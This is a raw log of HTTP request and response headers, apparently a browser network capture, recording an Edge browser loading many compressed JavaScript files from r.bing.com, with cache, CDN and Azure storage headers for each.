expires: Sat, 02 Mar 2024 20:12:42 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/0UgTj-oiRnDKC7d-RWXdk9x4j00.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dTUVGfz3dNCTAE9596KTBQ==
last-modified: Tue, 17 Oct 2023 15:23:19 GMT
etag: 0x8DBCF24FE54087F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7438d5c0-301e-0039-1d3c-5bbe36000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=60575
expires: Fri, 01 Mar 2024 08:21:24 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/pYx84E5QxKsDa_GCjDkQj38YO0k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: MH86c+Cw/X3ukvifBPzDeQ==
last-modified: Mon, 12 Jun 2023 12:03:32 GMT
etag: 0x8DB6B3D0B11DF34
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9aeff402-901e-00a0-1b46-2f64f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=99140
expires: Fri, 01 Mar 2024 19:04:09 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/kNUdPzzLEbQzYr3icm3MTxwk6-Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nr9dytJCAtZrkdlxzmBpIg==
last-modified: Tue, 27 Dec 2022 08:56:39 GMT
etag: 0x8DAE7E8448B0484
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ad7dce10-901e-00a0-6947-0864f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1847
cache-control: public, no-transform, max-age=103062
expires: Fri, 01 Mar 2024 20:09:31 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/y9cMttd-SwSaYuiqhqk701fxHs0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DB2393B40E724D
akamai-grn: 0.59281102.1707078580.87610de3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: cjiiNPsYSsV3a8xOZhlPWw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aa1f8bd5-701e-00b8-375d-30bb97000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1937
cache-control: public, no-transform, max-age=31012
expires: Fri, 01 Mar 2024 00:08:41 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a4
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/5F86_iDyVt4Fjf1Blaqa2W_2tsA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DBAA99AE594AB9
akamai-grn: 0.39fd4817.1709097904.1ab741ff
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: QgytsIOV4fBmFqtprCDNwA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ff27bd8e-401e-0025-55d7-17492d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1336
cache-control: public, no-transform, max-age=79771
expires: Fri, 01 Mar 2024 13:41:20 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a6
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/MCwdqGFTwqu20jt3177s57V4wZk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6CIgOkytlGCbuuRvU1ESHg==
last-modified: Wed, 17 Aug 2022 05:48:11 GMT
etag: 0x8DA801411D19CBC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e2fe0934-c01e-003d-245f-5b3331000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 109
cache-control: public, no-transform, max-age=63143
expires: Fri, 01 Mar 2024 09:04:12 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/e5E3S-lkItFHIqVf6KjzTWPZb6Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: znoueNHGlInvtcdG07bAhA==
last-modified: Fri, 26 Jan 2024 14:29:34 GMT
etag: 0x8DC1E7B37A4D1B3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: be607c19-501e-0010-4a98-508042000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 798
cache-control: public, no-transform, max-age=235510
expires: Sun, 03 Mar 2024 08:56:59 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/q3vkafrVjv12grVkPQlJmLegna0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DBCF24FE8731F4
akamai-grn: 0.04fd4817.1709031131.60687f6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: tT0DVwJF1v3ptIVmxNbKXQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d42e088-d01e-00b7-74eb-506880000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2655
cache-control: public, no-transform, max-age=42664
expires: Fri, 01 Mar 2024 03:22:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9a9
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/4CqZEDbQQNo8pxNGAY-pz2gS6TM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DBF151750E1366
akamai-grn: 0.558a4917.1707997889.2aadb9e5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: Aw9ltb/YgLVgxc+JhkL/5Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7617fd42-b01e-007c-1777-2bceae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2286
akamai-grn: 0.91301060.1708337138.688c918e
cache-control: public, no-transform, max-age=170485
expires: Sat, 02 Mar 2024 14:53:14 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9aa
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/BnykzSrhLLq7vL0UKHbUNqrGDVk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cqb9lPMRcoZUHHI7vKeVSQ==
last-modified: Thu, 30 Nov 2023 03:07:16 GMT
etag: 0x8DBF151750E6181
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 37a88939-001e-00ef-2851-2415a4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 11008
cache-control: public, no-transform, max-age=145984
expires: Sat, 02 Mar 2024 08:04:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9ab
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/oGyDh-oDLn6IkPalHPWMedvSDQA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4soXuH03Iu/zNiit8H8BmA==
last-modified: Mon, 04 Dec 2023 12:00:09 GMT
etag: 0x8DBF4C0901A51A4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e51f88bb-e01e-0085-126d-3dcd8c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=146270
expires: Sat, 02 Mar 2024 08:09:39 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9ac
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/mbuFLljzSy6Z7Kc_zphPXIgvoh0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: m8DBqPegFmM0igW4CyM/og==
last-modified: Thu, 02 Mar 2023 06:34:36 GMT
etag: 0x8DB1AE8310C1186
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cabad7e1-801e-002c-2d95-52a985000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2148
cache-control: public, no-transform, max-age=310907
expires: Mon, 04 Mar 2024 05:53:36 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9ad
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/VUEGpxZelMIx8NNutjmSt3-y1iY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 1x0J2MCveB48tGEnLM3FyA==
last-modified: Tue, 10 Jan 2023 07:12:51 GMT
etag: 0x8DAF2DA163DC0E3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2d2497fd-301e-004d-5374-312fbd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=149435
expires: Sat, 02 Mar 2024 09:02:24 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9ae
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: jDpfrkHEWPKiRt+7YgCBFw==
last-modified: Wed, 17 Aug 2022 05:27:06 GMT
etag: 0x8DA8011202AA3B8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b780a46c-001e-00b4-576d-6589e4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=243180
expires: Sun, 03 Mar 2024 11:04:49 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9af
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/IZJX7X52Yk3KGeZJqEoHg_kDPy0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: sqwUCmnGDbSjUU6dGoZaHw==
last-modified: Thu, 15 Feb 2024 07:12:41 GMT
etag: 0x8DC2DF57F8EFC2F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 37889417-801e-004e-57ca-636ba2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2544
vary: Accept-Encoding
akamai-grn: 0.76361602.1708928007.f63740b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.59281102.1709166239.1f9ac2b1
cache-control: public, no-transform, max-age=12464
expires: Thu, 29 Feb 2024 18:59:33 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b0
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/W6JA1dqYURoDF58Us-rKOCztnvE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: sRUJhba0nGKMvqYh9Hu4Bw==
last-modified: Tue, 21 Mar 2023 02:32:28 GMT
etag: 0x8DB29B4838AA17F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: de459b04-201e-00a5-519d-2bb62b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=100428
expires: Fri, 01 Mar 2024 19:25:37 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/oumz7WWsPEpvI2GvDjnAYme8IVY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ggWRE1p+9vYdbYKr8BIhKg==
last-modified: Mon, 26 Feb 2024 13:15:43 GMT
etag: 0x8DC36CD099A9ABD
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0b2bc05b-201e-0078-71e0-68e6d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.c0777b5c.1708972230.2018e468
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=182835
expires: Sat, 02 Mar 2024 18:19:04 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b2
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/mSXQPT7e1TlMt8h0fagSrjh90gY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: bbDlxvGSa5GNp3fJ7DLQGg==
last-modified: Thu, 30 Nov 2023 17:19:38 GMT
etag: 0x8DBF1C888573CA2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 492b3728-401e-0068-7578-4486c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1200
